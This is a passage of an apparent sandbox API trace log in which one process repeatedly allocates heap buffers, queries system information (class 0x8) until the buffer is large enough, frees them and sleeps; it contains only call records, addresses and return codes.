ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.874] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0248.874] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0248.874] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.875] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0248.875] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0248.875] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.876] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0248.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0248.876] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.876] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0248.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.877] Sleep (dwMilliseconds=0x110) [0248.890] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0248.890] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0248.891] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0248.891] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0248.891] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0248.891] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.892] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0248.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0248.892] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0248.893] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.893] Sleep (dwMilliseconds=0x110) [0248.905] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0248.905] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.906] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0248.906] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0248.906] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.907] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0248.907] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0248.907] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.908] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0248.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0248.908] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0248.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.909] Sleep (dwMilliseconds=0x110) [0248.920] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0248.920] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.921] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0248.921] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0248.921] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.922] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0248.922] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0248.922] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.923] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0248.923] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0248.923] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.923] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0248.923] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.924] Sleep (dwMilliseconds=0x110) [0248.935] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0248.935] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.935] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0248.941] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0248.941] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0248.941] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0248.941] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.942] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0248.942] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0248.942] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.942] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0248.942] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.943] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.943] Sleep (dwMilliseconds=0x110) [0248.952] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0248.952] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.952] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0248.952] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0248.952] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0248.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0248.953] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.954] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0248.954] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0248.954] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.955] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0248.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.955] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.955] Sleep (dwMilliseconds=0x110) [0248.966] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0248.966] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.967] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0248.967] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0248.967] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.967] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0248.967] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0248.967] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.968] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0248.968] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0248.968] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.969] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0248.969] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.969] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.969] Sleep (dwMilliseconds=0x110) [0248.986] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0248.986] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0248.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0248.987] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.988] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0248.988] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0248.988] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.989] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0248.989] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0248.989] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.990] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0248.990] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.992] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.992] Sleep (dwMilliseconds=0x110) [0248.997] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0248.997] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.998] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0248.998] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0248.998] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.999] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0248.999] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0248.999] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.999] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0248.999] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0249.000] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.000] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0249.000] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.000] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.001] Sleep (dwMilliseconds=0x110) [0249.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0249.017] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0249.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0249.018] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0249.019] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0249.019] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.020] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0249.020] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0249.020] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.020] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0249.020] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.020] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.020] Sleep (dwMilliseconds=0x110) [0249.028] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0249.028] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.029] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0249.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0249.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0249.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0249.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0249.035] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0249.035] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0249.035] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.036] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.036] Sleep (dwMilliseconds=0x110) [0249.073] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0249.073] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.074] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0249.074] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0249.074] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.075] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0249.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0249.081] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0249.082] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0249.082] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.083] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0249.083] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.083] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.083] Sleep (dwMilliseconds=0x110) [0249.094] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0249.094] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.095] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0249.095] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0249.095] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0249.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0249.096] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0249.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0249.097] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.098] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0249.098] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.098] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.098] Sleep (dwMilliseconds=0x110) [0249.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0249.112] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0249.113] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0249.113] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0249.114] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0249.114] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.114] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0249.114] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0249.114] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.115] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0249.115] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.116] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.116] Sleep (dwMilliseconds=0x110) [0249.124] RtlAllocateHeap 